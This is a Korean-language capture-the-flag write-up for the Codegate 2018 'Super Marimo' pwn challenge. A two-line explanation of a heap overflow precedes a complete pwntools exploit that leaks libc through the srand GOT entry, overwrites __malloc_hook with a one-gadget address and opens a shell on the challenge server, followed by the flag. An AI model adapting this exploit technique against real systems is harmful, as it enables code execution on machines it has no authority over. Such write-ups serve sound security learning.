Codegate CTF 2018 Preliminary - Super Marimo (Pwn)

문제 파일 (marimo)

show me the marimo를 통해 marimo를 2개 생성한다.
시간이 지나면 marimosize가 커져서 overflow가 터진다.

libc는 로컬환경이랑 같을까 싶어서 시도해봤더니 운좋게도 같았다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
from pwn import *

def cheat(name, profile):
r.sendline('show me the marimo')
r.sendlineafter('>> ', name)
r.sendlineafter('>> ', profile)
r.recvuntil('>> ')

def view(idx):
r.sendline('V')
r.sendlineafter('>> ', str(idx))
d = r.recvuntil('\n\n[', drop=True)
r.sendline('B')
r.recvuntil('>> ')
return d

def modify(idx, profile):
r.sendline('V')
r.sendlineafter('>> ', str(idx))
d = r.recvuntil('>> ')
r.sendline('M')
r.sendlineafter('>> ', profile)
r.recvuntil('>> ')
r.sendline('B')
r.recvuntil('>> ')

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./marimo_sym')

# r = process('./marimo_sym')
# print 'pidof : ', pidof(r)

r = remote('ch41l3ng3s.codegate.kr', 3333)

print r.recvuntil('>> ')

cheat('AAAA', 'CCCC')
cheat('BBBB', 'DDDD')
sleep(0x32)

payload = p64(0) * 7
payload += p64(elf.got['srand'])

modify(0, payload)

name = view(1).split('\n')[5][7:]

leak_srand = u64(name.ljust(8, '\x00'))
libc.address = leak_srand - libc.symbols['srand']
one_shot = libc.address + 0xf02a4

log.info('leak_srand : ' + hex(leak_srand))
log.info('libc_base : ' + hex(libc.address))
log.info('__malloc_hook : ' + hex(libc.symbols['__malloc_hook']))
log.info('one_shot : ' + hex(one_shot))

payload = p64(0) * 8
payload += p64(libc.symbols['__malloc_hook'])
modify(0, payload)

payload = p64(one_shot)
modify(1, payload)

r.sendline('show me the marimo')

r.interactive()

flag : But_every_cat_is_more_cute_than_Marimo

Share